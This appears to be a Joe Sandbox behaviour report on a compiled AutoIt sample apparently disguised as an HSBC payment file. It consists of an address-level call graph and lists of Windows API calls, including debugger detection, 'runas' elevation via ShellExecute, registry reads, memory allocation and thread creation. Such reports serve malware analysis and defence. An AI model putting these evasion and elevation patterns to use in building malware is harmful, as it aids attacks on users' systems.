729c90 59 API calls Mailbox 102790->102880 102881 7993c6 341 API calls Mailbox 102790->102881 102792 72f650 102791->102792 102793 72f4ba 102791->102793 102796 727de1 59 API calls 102792->102796 102794 72f4c6 102793->102794 102795 76441e 102793->102795 102974 72f290 341 API calls 2 library calls 102794->102974 102976 79bc6b 341 API calls Mailbox 102795->102976 102802 72f58c Mailbox 102796->102802 102799 76442c 102803 72f630 102799->102803 102977 789e4a 89 API calls 4 library calls 102799->102977 102801 72f4fd 102801->102799 102801->102802 102801->102803 102888 79df23 102802->102888 102891 78cb7a 102802->102891 102971 783c37 102802->102971 102803->101722 102805 72f5e3 102805->102803 102975 729c90 59 API calls Mailbox 102805->102975 102809->101722 102810->101722 102811->101722 102812->101660 102813->101665 102814->101722 102815->101667 102816->101667 102817->101667 102818->101722 102819->101722 102820->101722 102822 729851 102821->102822 102823 72984b 102821->102823 102824 75f5d3 __i64tow 102822->102824 102825 729899 102822->102825 102826 729857 __itow 102822->102826 102830 75f4da 102822->102830 102823->101722 103224 743698 83 API calls 3 library calls 102825->103224 102828 740db6 Mailbox 59 API calls 102826->102828 102831 729871 102828->102831 102832 740db6 Mailbox 59 API calls 102830->102832 102837 75f552 Mailbox _wcscpy 102830->102837 102831->102823 102833 727de1 59 API calls 102831->102833 102834 75f51f 102832->102834 102833->102823 102835 740db6 Mailbox 59 API calls 102834->102835 102836 75f545 102835->102836 102836->102837 102838 727de1 59 API calls 102836->102838 103225 743698 83 API calls 3 library calls 102837->103225 102838->102837 102839->101722 102840->101722 102841->101722 102842->101716 102843->101716 102844->101716 102845->101716 102846->101716 102847->101716 102848->101716 102849->102790 102851 729ebf 102850->102851 102871 729eed Mailbox 102850->102871 102852 740db6 Mailbox 59 API calls 102851->102852 102852->102871 102853 742d40 67 API calls __cinit 102853->102871 102854 72b47a 102859 7609e5 102854->102859 102860 760055 102854->102860 102855 72b475 102856 728047 59 API calls 102855->102856 102857 72a057 102856->102857 102857->102764 102858 740db6 59 API calls Mailbox 102858->102871 102887 789e4a 89 API calls 4 library calls 102859->102887 102884 789e4a 89 API calls 4 library calls 102860->102884 102864 760064 102864->102764 102867 728047 59 API calls 102867->102871 102868 727667 59 API calls 102868->102871 102869 776e8f 59 API calls 102869->102871 102870 7609d6 102886 789e4a 89 API calls 4 library calls 102870->102886 102871->102853 102871->102854 102871->102855 102871->102857 102871->102858 102871->102860 102871->102867 102871->102868 102871->102869 102871->102870 102873 72a55a 102871->102873 102882 72c8c0 341 API calls 2 library calls 102871->102882 102883 72b900 60 API calls Mailbox 102871->102883 102885 789e4a 89 API calls 4 library calls 102873->102885 102874->102790 102875->102790 102876->102790 102877->102790 102878->102790 102879->102788 102880->102790 102881->102790 102882->102871 102883->102871 102884->102864 102885->102857 102886->102859 102887->102857 102978 79cadd 102888->102978 102890 79df33 102890->102805 102892 727667 59 API calls 102891->102892 102893 78cbaf 102892->102893 102894 727667 59 API calls 102893->102894 102895 78cbb8 102894->102895 102896 78cbcc 102895->102896 103177 729b3c 59 API calls 102895->103177 102898 729837 84 API calls 102896->102898 102899 78cbe9 102898->102899 102900 78ccea 102899->102900 102901 78cc0b 102899->102901 102906 78cd1a Mailbox 102899->102906 102903 724ddd 136 API calls 102900->102903 102902 729837 84 API calls 102901->102902 102904 78cc17 102902->102904 102905 78ccfe 102903->102905 102907 728047 59 API calls 102904->102907 102908 78cd16 102905->102908 102911 724ddd 136 API calls 102905->102911 102906->102805 102910 78cc23 102907->102910 102908->102906 102909 727667 59 API calls 102908->102909 102912 78cd4b 102909->102912 102915 78cc69 102910->102915 102916 78cc37 102910->102916 102911->102908 102913 727667 59 API calls 102912->102913 102914 78cd54 102913->102914 102918 727667 59 API calls 102914->102918 102917 729837 84 API calls 102915->102917 102919 728047 59 API calls 102916->102919 102920 78cc76 102917->102920 102921 78cd5d 102918->102921 102922 78cc47 102919->102922 102923 728047 59 API calls 102920->102923 102924 727667 59 API calls 102921->102924 102925 727cab 59 API calls 102922->102925 102926 78cc82 102923->102926 102927 78cd66 102924->102927 102928 78cc51 102925->102928 103178 784a31 GetFileAttributesW 102926->103178 102930 729837 84 API calls 102927->102930 102931 729837 84 API calls 102928->102931 102933 78cd73 102930->102933 102934 78cc5d 102931->102934 102932 78cc8b 102936 78cc9e 102932->102936 102938 7279f2 59 API calls 102932->102938 102937 72459b 59 API calls 102933->102937 102935 727b2e 59 API calls 102934->102935 102935->102915 102940 729837 84 API calls 102936->102940 102945 78cca4 102936->102945 102939 78cd8e 102937->102939 102938->102936 102942 7279f2 59 API calls 102939->102942 102941 78cccb 102940->102941 103179 7837ef 75 API calls Mailbox 102941->103179 102944 78cd9d 102942->102944 102946 78cdd1 102944->102946 102948 7279f2 59 API calls 102944->102948 102945->102906 102947 728047 59 API calls 102946->102947 102950 78cddf 102947->102950 102949 78cdae 102948->102949 102949->102946 102952 727bcc 59 API calls 102949->102952 102951 727b2e 59 API calls 102950->102951 102953 78cded 102951->102953 102954 78cdc3 102952->102954 102955 727b2e 59 API calls 102953->102955 102956 727bcc 59 API calls 102954->102956 102957 78cdfb 102955->102957 102956->102946 102958 727b2e 59 API calls 102957->102958 102959 78ce09 102958->102959 102960 729837 84 API calls 102959->102960 102961 78ce15 102960->102961 103068 784071 102961->103068 102963 78ce26 102964 783c37 3 API calls 102963->102964 102965 78ce30 102964->102965 102966 729837 84 API calls 102965->102966 102970 78ce61 102965->102970 102967 78ce4e 102966->102967 103122 789155 102967->103122 102969 724e4a 84 API calls 102969->102906 102970->102969 103220 78445a GetFileAttributesW 102971->103220 102974->102801 102975->102805 102976->102799 102977->102803 102979 729837 84 API calls 102978->102979 102980 79cb1a 102979->102980 102986 79cb61 Mailbox 102980->102986 103016 79d7a5 102980->103016 102982 79cbb2 Mailbox 102982->102986 102990 729837 84 API calls 102982->102990 103003 79cdb9 102982->103003 103048 79fbce 59 API calls 2 library calls 102982->103048 103049 79cfdf 61 API calls 2 library calls 102982->103049 102983 79cf2e 103055 79d8c8 92 API calls Mailbox 102983->103055 102984 79cdc7 103029 79c96e 102984->103029 102986->102890 102988 79cf3d 102988->102984 102989 79cf49 102988->102989 102989->102986 102990->102982 102995 79ce00 103044 740c08 102995->103044 102998 79ce1a 103050 789e4a 89 API calls 4 library calls 102998->103050 102999 79ce33 103001 7292ce 59 API calls 102999->103001 103004 79ce3f 103001->103004 103002 79ce25 GetCurrentProcess TerminateProcess 103002->102999 103003->102983 103003->102984 103005 729050 59 API calls 103004->103005 103006 79ce55 103005->103006 103015 79ce7c 103006->103015 103051 728d40 59 API calls Mailbox 103006->103051 103008 79cfa4 103008->102986 103012 79cfb8 FreeLibrary 103008->103012 103009 79ce6b 103052 79d649 107 API calls _free 103009->103052 103012->102986 103015->103008 103053 728d40 59 API calls Mailbox 103015->103053 103054 729d3c 60 API calls Mailbox 103015->103054 103056 79d649 107 API calls _free 103015->103056 103017 727e4f 59 API calls 103016->103017 103018 79d7c0 CharLowerBuffW 103017->103018 103057 77f167 103018->103057 103022 727667 59 API calls 103023 79d7f9 103022->103023 103024 72784b 59 API calls 103023->103024 103025 79d810 103024->103025 103027 727d2c 59 API calls 103025->103027 103026 79d858 Mailbox 103026->102982 103028 79d81c Mailbox 103027->103028 103028->103026 103064 79cfdf 61 API calls 2 library calls 103028->103064 103030 79c989 103029->103030 103034 79c9de 103029->103034 103031 740db6 Mailbox 59 API calls 103030->103031 103032 79c9ab 103031->103032 103033 740db6 Mailbox 59 API calls 103032->103033 103032->103034 103033->103032 103035 79da50 103034->103035 103036 79dc79 Mailbox 103035->103036 103041 79da73 _strcat _wcscpy __NMSG_WRITE 103035->103041 103036->102995 103037 729b3c 59 API calls 103037->103041 103038 729be6 59 API calls 103038->103041 103039 729b98 59 API calls 103039->103041 103040 74571c 58 API calls __crtLCMapStringA_stat 103040->103041 103041->103036 103041->103037 103041->103038 103041->103039 103041->103040 103042 729837 84 API calls 103041->103042 103067 785887 61 API calls 2 library calls 103041->103067 103042->103041 103045 740c1d 103044->103045 103046 740cb5 VirtualAlloc 103045->103046 103047 740c83 103045->103047 103046->103047 103047->102998 103047->102999 103048->102982 103049->102982 103050->103002 103051->103009 103052->103015 103053->103015 103054->103015 103055->102988 103056->103015 103059 77f192 __NMSG_WRITE 103057->103059 103058 77f1d1 103058->103022 103058->103028 103059->103058 103060 77f1c7 103059->103060 103061 77f278 103059->103061 103060->103058 103065 7278c4 61 API calls 103060->103065 103061->103058 103066 7278c4 61 API calls 103061->103066 103064->103026 103065->103060 103066->103061 103067->103041 103069 78408d 103068->103069 103070 7840a0 103069->103070 103071 784092 103069->103071 103073 727667 59 API calls 103070->103073 103072 728047 59 API calls 103071->103072 103075 78409b Mailbox 103072->103075 103074 7840a8 103073->103074 103076 727667 59 API calls 103074->103076 103075->102963 103077 7840b0 103076->103077 103078 727667 59 API calls 103077->103078 103079 7840bb 103078->103079 103080 727667 59 API calls 103079->103080 103081 7840c3 103080->103081 103082 727667 59 API calls 103081->103082 103083 7840cb 103082->103083 103084 727667 59 API calls 103083->103084 103085 7840d3 103084->103085 103086 727667 59 API calls 103085->103086 103087 7840db 103086->103087 103088 727667 59 API calls 103087->103088 103089 7840e3 103088->103089 103090 72459b 59 API calls 103089->103090 103091 7840fa 103090->103091 103092 72459b 59 API calls 103091->103092 103093 784113 103092->103093 103094 7279f2 59 API calls 103093->103094 103095 78411f 103094->103095 103096 784132 103095->103096 103097 727d2c 59 API calls 103095->103097 103098 7279f2 59 API calls 103096->103098 103097->103096 103099 78413b 103098->103099 103100 78414b 103099->103100 103101 727d2c 59 API calls 103099->103101 103102 728047 59 API calls 103100->103102 103101->103100 103103 784157 103102->103103 103104 727b2e 59 API calls 103103->103104 103105 784163 103104->103105 103180 784223 59 API calls 103105->103180 103107 784172 103181 784223 59 API calls 103107->103181 103109 784185 103110 7279f2 59 API calls 103109->103110 103111 78418f 103110->103111 103112 784194 103111->103112 103113 7841a6 103111->103113 103114 727cab 59 API calls 103112->103114 103115 7279f2 59 API calls 103113->103115 103116 7841a1 103114->103116 103117 7841af 103115->103117 103119 727b2e 59 API calls 103116->103119 103118 7841cd 103117->103118 103121 727cab 59 API calls 103117->103121 103120 727b2e 59 API calls 103118->103120 103119->103118 103120->103075 103121->103116 103123 789162 __ftell_nolock 103122->103123 103124 740db6 Mailbox 59 API calls 103123->103124 103125 7891bf 103124->103125 103126 72522e 59 API calls 103125->103126 103127 7891c9 103126->103127 103128 788f5f GetSystemTimeAsFileTime 103127->103128 103129 7891d4 103128->103129 103130 724ee5 85 API calls 103129->103130 103131 7891e7 _wcscmp 103130->103131 103132 7892b8 103131->103132 103133 78920b 103131->103133 103134 789734 96 API calls 103132->103134 103135 789734 96 API calls 103133->103135 103150 789284 _wcscat 103134->103150 103136 789210 103135->103136 103139 7892c1 103136->103139 103199 7440fb 58 API calls __wsplitpath_helper 103136->103199 103138 724f0b 74 API calls 103140 7892dd 103138->103140 103139->102970 103141 724f0b 74 API calls 103140->103141 103143 7892ed 103141->103143 103142 789239 _wcscat _wcscpy 103200 7440fb 58 API calls __wsplitpath_helper 103142->103200 103144 724f0b 74 API calls 103143->103144 103146 789308 103144->103146 103147 724f0b 74 API calls 103146->103147 103148 789318 103147->103148 103149 724f0b 74 API calls 103148->103149 103151 789333 103149->103151 103150->103138 103150->103139 103152 724f0b 74 API calls 103151->103152 103153 789343 103152->103153 103154 724f0b 74 API calls 103153->103154 103155 789353 103154->103155 103156 724f0b 74 API calls 103155->103156 103157 789363 103156->103157 103182 7898e3 GetTempPathW GetTempFileNameW 103157->103182 103159 78936f 103160 74525b 115 API calls 103159->103160 103162 789380 103160->103162 103161 7453a6 __fcloseall 83 API calls 103163 789445 103161->103163 103162->103139 103164 724f0b 74 API calls 103162->103164 103175 78943a 103162->103175 103183 744863 103162->103183 103165 78944b DeleteFileW 103163->103165 103166 78945f 103163->103166 103164->103162 103165->103139 103167 789505 CopyFileW 103166->103167 103170 789469 _wcsncpy 103166->103170 103201 788b06 116 API calls __fcloseall 103170->103201 103175->103161 103177->102896 103178->102932 103179->102945 103180->103107 103181->103109 103182->103159 103184 74486f _flsall 103183->103184 103185 7448a5 103184->103185 103186 74488d 103184->103186 103187 74489d _flsall 103184->103187 103188 746c11 __lock_file 59 API calls 103185->103188 103214 748b28 58 API calls __getptd_noexit 103186->103214 103187->103162 103191 7448ab 103188->103191 103190 744892 103199->103142 103200->103150 103214->103190 103221 784475 FindFirstFileW 103220->103221 103223 783c3e 103220->103223 103222 78448a FindClose 103221->103222 103221->103223 103222->103223 103223->102805 103224->102826 103225->102824 103226 721066 103231 72f76f 103226->103231 103228 72106c 103229 742d40 __cinit 67 API calls 103228->103229 103230 721076 103229->103230 103232 72f790 103231->103232 103264 73ff03 103232->103264 103236 72f7d7 103237 727667 59 API calls 103236->103237 103238 72f7e1 103237->103238 103239 727667 59 API calls 103238->103239 103240 72f7eb 103239->103240 103241 727667 59 API calls 103240->103241 103242 72f7f5 103241->103242 103243 727667 59 API calls 103242->103243 103244 72f833 103243->103244 103245 727667 59 API calls 103244->103245 103246 72f8fe 103245->103246 103274 735f87 103246->103274 103250 72f930 103251 727667 59 API calls 103250->103251 103252 72f93a 103251->103252 103302 73fd9e 103252->103302 103254 72f981 103255 72f991 GetStdHandle 103254->103255 103256 7645ab 103255->103256 103257 72f9dd 103255->103257 103256->103257 103259 7645b4 103256->103259 103258 72f9e5 OleInitialize 103257->103258 103258->103228 103309 786b38 64 API calls Mailbox 103259->103309 103261 7645bb 103310 787207 CreateThread 103261->103310 103263 7645c7 CloseHandle 103263->103258 103311 73ffdc 103264->103311 103267 73ffdc 59 API calls 103268 73ff45 103267->103268 103269 727667 59 API calls 103268->103269 103270 73ff51 103269->103270 103271 727bcc 59 API calls 103270->103271 103272 72f796 103271->103272 103273 740162 6 API calls 103272->103273 103273->103236 103275 727667 59 API calls 103274->103275 103276 735f97 103275->103276 103277 727667 59 API calls 103276->103277 103278 735f9f 103277->103278 103318 735a9d 103278->103318 103281 735a9d 59 API calls 103282 735faf 103281->103282 103283 727667 59 API calls 103282->103283 103284 735fba 103283->103284 103285 740db6 Mailbox 59 API calls 103284->103285 103286 72f908 103285->103286 103287 7360f9 103286->103287 103288 736107 103287->103288 103289 727667 59 API calls 103288->103289 103290 736112 103289->103290 103291 727667 59 API calls 103290->103291 103292 73611d 103291->103292 103293 727667 59 API calls 103292->103293 103294 736128 103293->103294 103295 727667 59 API calls 103294->103295 103296 736133 103295->103296 103297 735a9d 59 API calls 103296->103297 103298 73613e 103297->103298 103299 740db6 Mailbox 59 API calls 103298->103299 103300 736145 RegisterWindowMessageW 103299->103300 103300->103250 103303 77576f 103302->103303 103304 73fdae 103302->103304 103321 789ae7 60 API calls 103303->103321 103305 740db6 Mailbox 59 API calls 103304->103305 103308 73fdb6 103305->103308 103307 77577a 103308->103254 103309->103261 103310->103263 103322 7871ed 65 API calls 103310->103322 103312 727667 59 API calls 103311->103312 103313 73ffe7 103312->103313 103314 727667 59 API calls 103313->103314 103315 73ffef 103314->103315 103316 727667 59 API calls 103315->103316 103317 73ff3b 103316->103317 103317->103267 103319 727667 59 API calls 103318->103319 103320 735aa5 103319->103320 103320->103281 103321->103307 103323 721016 103328 724974 103323->103328 103326 742d40 __cinit 67 API calls 103327 721025 103326->103327 103329 740db6 Mailbox 59 API calls 103328->103329 103330 72497c 103329->103330 103331 72101b 103330->103331 103335 724936 103330->103335 103331->103326 103336 724951 103335->103336 103337 72493f 103335->103337 103339 7249a0 103336->103339 103338 742d40 __cinit 67 API calls 103337->103338 103338->103336 103340 727667 59 API calls 103339->103340 103341 7249b8 GetVersionExW 103340->103341 103342 727bcc 59 API calls 103341->103342 103343 7249fb 103342->103343 103344 727d2c 59 API calls 103343->103344 103349 724a28 103343->103349 103345 724a1c 103344->103345 103346 727726 59 API calls 103345->103346 103346->103349 103347 724a93 GetCurrentProcess IsWow64Process 103348 724aac 103347->103348 103351 724ac2 103348->103351 103352 724b2b GetSystemInfo 103348->103352 103349->103347 103350 75d864 103349->103350 103363 724b37 103351->103363 103354 724af8 103352->103354 103354->103331 103356 724ad4 103358 724b37 2 API calls 103356->103358 103357 724b1f GetSystemInfo 103359 724ae9 103357->103359 103360 724adc GetNativeSystemInfo 103358->103360 103359->103354 103361 724aef FreeLibrary 103359->103361 103360->103359 103361->103354 103364 724ad0 103363->103364 103365 724b40 LoadLibraryA 103363->103365 103364->103356 103364->103357 103365->103364 103366 724b51 GetProcAddress 103365->103366 103366->103364 103367 788d0d 103368 788d1a 103367->103368 103369 788d20 103367->103369 103370 742d55 _free 58 API calls 103368->103370 103371 742d55 _free 58 API calls 103369->103371 103372 788d31 103369->103372 103370->103369 103371->103372 103373 788d43 103372->103373 103374 742d55 _free 58 API calls 103372->103374 103374->103373 103375 721055 103380 722649 103375->103380 103378 742d40 __cinit 67 API calls 103379 721064 103378->103379 103381 727667 59 API calls 103380->103381 103382 7226b7 103381->103382 103387 723582 103382->103387 103385 722754 103386 72105a 103385->103386 103390 723416 59 API calls 2 library calls 103385->103390 103386->103378 103391 7235b0 103387->103391 103390->103385 103392 7235a1 103391->103392 103393 7235bd 103391->103393 103392->103385 103393->103392 103394 7235c4 RegOpenKeyExW 103393->103394 103394->103392 103395 7235de RegQueryValueExW 103394->103395 103396 723614 RegCloseKey 103395->103396 103397 7235ff 103395->103397 103396->103392 103397->103396 103398 1f823b0 103412 1f80000 103398->103412 103400 1f82460 103415 1f822a0 103400->103415 103418 1f83490 GetPEB 103412->103418 103414 1f8068b 103414->103400 103416 1f822a9 Sleep 103415->103416 103417 1f822b7 103416->103417 103419 1f834ba 103418->103419 103419->103414 103420 76416f 103424 775fe6 103420->103424 103422 76417a 103423 775fe6 85 API calls 103422->103423 103423->103422 103425 776020 103424->103425 103430 775ff3 103424->103430 103425->103422 103426 776022 103436 729328 84 API calls Mailbox 103426->103436 103428 776027 103429 729837 84 API calls 103428->103429 103431 77602e 103429->103431 103430->103425 103430->103426 103430->103428 103433 77601a 103430->103433 103432 727b2e 59 API calls 103431->103432 103432->103425 103435 7295a0 59 API calls _wcsstr 103433->103435 103435->103425 103436->103428 103437 75fdfc 103456 72ab30 Mailbox _memmove 103437->103456 103442 72b525 103497 789e4a 89 API calls 4 library calls 103442->103497 103444 7609e5 103503 789e4a 89 API calls 4 library calls 103444->103503 103445 760055 103496 789e4a 89 API calls 4 library calls 103445->103496 103446 729f37 Mailbox 103446->103445 103448 72b47a 103446->103448 103451 72b475 103446->103451 103452 740db6 59 API calls Mailbox 103446->103452 103453 728047 59 API calls 103446->103453 103454 72a057 103446->103454 103461 727667 59 API calls 103446->103461 103462 776e8f 59 API calls 103446->103462 103463 742d40 67 API calls __cinit 103446->103463 103465 7609d6 103446->103465 103467 72a55a 103446->103467 103485 72c8c0 341 API calls 2 library calls 103446->103485 103486 72b900 60 API calls Mailbox 103446->103486 103448->103444 103448->103445 103458 728047 59 API calls 103451->103458 103452->103446 103453->103446 103455 760064 103456->103442 103456->103446 103456->103454 103464 727de1 59 API calls 103456->103464 103470 740db6 59 API calls Mailbox 103456->103470 103471 72b2b6 103456->103471 103473 729ea0 341 API calls 103456->103473 103474 76086a 103456->103474 103476 760878 103456->103476 103478 76085c 103456->103478 103479 72b21c 103456->103479 103483 776e8f 59 API calls 103456->103483 103484 79df23 130 API calls 103456->103484 103487 729c90 59 API calls Mailbox 103456->103487 103491 79c193 85 API calls 2 library calls 103456->103491 103492 79c2e0 96 API calls Mailbox 103456->103492 103493 787956 59 API calls Mailbox 103456->103493 103494 79bc6b 341 API calls Mailbox 103456->103494 103495 77617e 59 API calls Mailbox 103456->103495 103458->103454 103461->103446 103462->103446 103463->103446 103464->103456 103502 789e4a 89 API calls 4 library calls 103465->103502 103501 789e4a 89 API calls 4 library calls 103467->103501 103470->103456 103490 72f6a3 341 API calls 103471->103490 103473->103456 103499 729c90 59 API calls Mailbox 103474->103499 103500 789e4a 89 API calls 4 library calls 103476->103500 103478->103454 103498 77617e 59 API calls Mailbox 103478->103498 103488 729d3c 60 API calls Mailbox 103479->103488 103481 72b22d 103489 729d3c 60 API calls Mailbox 103481->103489 103483->103456 103484->103456 103485->103446 103486->103446 103487->103456 103488->103481 103489->103471 103490->103442 103491->103456 103492->103456 103493->103456 103494->103456 103495->103456 103496->103455 103497->103478 103498->103454 103499->103478 103500->103478 103501->103454 103502->103444 103503->103454 103504 72107d 103509 72708b 103504->103509 103506 72108c 103507 742d40 __cinit 67 API calls 103506->103507 103508 721096 103507->103508 103510 72709b __ftell_nolock 103509->103510 103511 727667 59 API calls 103510->103511 103512 727151 103511->103512 103513 724706 61 API calls 103512->103513 103514 72715a 103513->103514 103540 74050b 103514->103540 103517 727cab 59 API calls 103518 727173 103517->103518 103519 723f74 59 API calls 103518->103519 103520 727182 103519->103520 103521 727667 59 API calls 103520->103521 103522 72718b 103521->103522 103523 727d8c 59 API calls 103522->103523 103524 727194 RegOpenKeyExW 103523->103524 103525 75e8b1 RegQueryValueExW 103524->103525 103530 7271b6 Mailbox 103524->103530 103526 75e943 RegCloseKey 103525->103526 103527 75e8ce 103525->103527 103526->103530 103536 75e955 _wcscat Mailbox __NMSG_WRITE 103526->103536 103528 740db6 Mailbox 59 API calls 103527->103528 103529 75e8e7 103528->103529 103531 72522e 59 API calls 103529->103531 103530->103506 103532 75e8f2 RegQueryValueExW 103531->103532 103533 75e90f 103532->103533 103535 75e929 103532->103535 103534 727bcc 59 API calls 103533->103534 103534->103535 103535->103526 103536->103530 103537 727de1 59 API calls 103536->103537 103538 723f74 59 API calls 103536->103538 103539 7279f2 59 API calls 103536->103539 103537->103536 103538->103536 103539->103536 103541 751940 __ftell_nolock 103540->103541 103542 740518 GetFullPathNameW 103541->103542 103543 74053a 103542->103543 103544 727bcc 59 API calls 103543->103544 103545 727165 103544->103545 103545->103517

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00723B68
                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00723B7A
                                                                                                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,007E52F8,007E52E0,?,?), ref: 00723BEB
                                                                                                                                  • Part of subcall function 00727BCC: _memmove.LIBCMT ref: 00727C06
                                                                                                                                  • Part of subcall function 0073092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00723C14,007E52F8,?,?,?), ref: 0073096E
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00723C6F
                                                                                                                                • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,007D7770,00000010), ref: 0075D281
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,007E52F8,?,?,?), ref: 0075D2B9
                                                                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,007D4260,007E52F8,?,?,?), ref: 0075D33F
                                                                                                                                • ShellExecuteW.SHELL32(00000000,?,?), ref: 0075D346
                                                                                                                                  • Part of subcall function 00723A46: GetSysColorBrush.USER32(0000000F), ref: 00723A50
                                                                                                                                  • Part of subcall function 00723A46: LoadCursorW.USER32(00000000,00007F00), ref: 00723A5F
                                                                                                                                  • Part of subcall function 00723A46: LoadIconW.USER32(00000063), ref: 00723A76
                                                                                                                                  • Part of subcall function 00723A46: LoadIconW.USER32(000000A4), ref: 00723A88
                                                                                                                                  • Part of subcall function 00723A46: LoadIconW.USER32(000000A2), ref: 00723A9A
                                                                                                                                  • Part of subcall function 00723A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00723AC0
                                                                                                                                  • Part of subcall function 00723A46: RegisterClassExW.USER32(?), ref: 00723B16
                                                                                                                                  • Part of subcall function 007239D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00723A03
                                                                                                                                  • Part of subcall function 007239D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00723A24
                                                                                                                                  • Part of subcall function 007239D5: ShowWindow.USER32(00000000,?,?), ref: 00723A38
                                                                                                                                  • Part of subcall function 007239D5: ShowWindow.USER32(00000000,?,?), ref: 00723A41
                                                                                                                                  • Part of subcall function 0072434A: _memset.LIBCMT ref: 00724370
                                                                                                                                  • Part of subcall function 0072434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00724415
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                                • String ID: This is a third-party compiled AutoIt script.$runas$%{
                                                                                                                                • API String ID: 529118366-1872128065
                                                                                                                                • Opcode ID: cf9516382bcdb52598b18289481b6d0e0309d3a7e8b187f80b5d0128591cb2e2
                                                                                                                                • Instruction ID: 3b8270cbb40f97214918419e2b3e54db905e6d0fed3c90668dae75bed2331b77
                                                                                                                                • Opcode Fuzzy Hash: cf9516382bcdb52598b18289481b6d0e0309d3a7e8b187f80b5d0128591cb2e2
                                                                                                                                • Instruction Fuzzy Hash: 3A5123B0D0919CEACF15EBB4EC49AED7B7CBB49304F008069F511AA1A2DA7C5A45CB24

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1039 7249a0-724a00 call 727667 GetVersionExW call 727bcc 1044 724a06 1039->1044 1045 724b0b-724b0d 1039->1045 1047 724a09-724a0e 1044->1047 1046 75d767-75d773 1045->1046 1050 75d774-75d778 1046->1050 1048 724b12-724b13 1047->1048 1049 724a14 1047->1049 1053 724a15-724a4c call 727d2c call 727726 1048->1053 1049->1053 1051 75d77b-75d787 1050->1051 1052 75d77a 1050->1052 1051->1050 1054 75d789-75d78e 1051->1054 1052->1051 1062 724a52-724a53 1053->1062 1063 75d864-75d867 1053->1063 1054->1047 1056 75d794-75d79b 1054->1056 1056->1046 1058 75d79d 1056->1058 1061 75d7a2-75d7a5 1058->1061 1064 724a93-724aaa GetCurrentProcess IsWow64Process 1061->1064 1065 75d7ab-75d7c9 1061->1065 1062->1061 1066 724a59-724a64 1062->1066 1067 75d880-75d884 1063->1067 1068 75d869 1063->1068 1075 724aaf-724ac0 1064->1075 1076 724aac 1064->1076 1065->1064 1069 75d7cf-75d7d5 1065->1069 1070 724a6a-724a6c 1066->1070 1071 75d7ea-75d7f0 1066->1071 1073 75d886-75d88f 1067->1073 1074 75d86f-75d878 1067->1074 1072 75d86c 1068->1072 1077 75d7d7-75d7da 1069->1077 1078 75d7df-75d7e5 1069->1078 1079 75d805-75d811 1070->1079 1080 724a72-724a75 1070->1080 1081 75d7f2-75d7f5 1071->1081 1082 75d7fa-75d800 1071->1082 1072->1074 1073->1072 1083 75d891-75d894 1073->1083 1074->1067 1084 724ac2-724ad2 call 724b37 1075->1084 1085 724b2b-724b35 GetSystemInfo 1075->1085 1076->1075 1077->1064 1078->1064 1090 75d813-75d816 1079->1090 1091 75d81b-75d821 1079->1091 1087 75d831-75d834 1080->1087 1088 724a7b-724a8a 1080->1088 1081->1064 1082->1064 1083->1074 1096 724ad4-724ae1 call 724b37 1084->1096 1097 724b1f-724b29 GetSystemInfo 1084->1097 1089 724af8-724b08 1085->1089 1087->1064 1093 75d83a-75d84f 1087->1093 1094 724a90 1088->1094 1095 75d826-75d82c 1088->1095 1090->1064 1091->1064 1098 75d851-75d854 1093->1098 1099 75d859-75d85f 1093->1099 1094->1064 1095->1064 1104 724ae3-724ae7 GetNativeSystemInfo 1096->1104 1105 724b18-724b1d 1096->1105 1101 724ae9-724aed 1097->1101 1098->1064 1099->1064 1101->1089 1103 724aef-724af2 FreeLibrary 1101->1103 1103->1089 1104->1101 1105->1104
                                                                                                                                APIs
                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 007249CD
                                                                                                                                  • Part of subcall function 00727BCC: _memmove.LIBCMT ref: 00727C06
                                                                                                                                • GetCurrentProcess.KERNEL32(?,007AFAEC,00000000,00000000,?), ref: 00724A9A
                                                                                                                                • IsWow64Process.KERNEL32(00000000), ref: 00724AA1
                                                                                                                                • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00724AE7
                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00724AF2
                                                                                                                                • GetSystemInfo.KERNEL32(00000000), ref: 00724B23
                                                                                                                                • GetSystemInfo.KERNEL32(00000000), ref: 00724B2F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
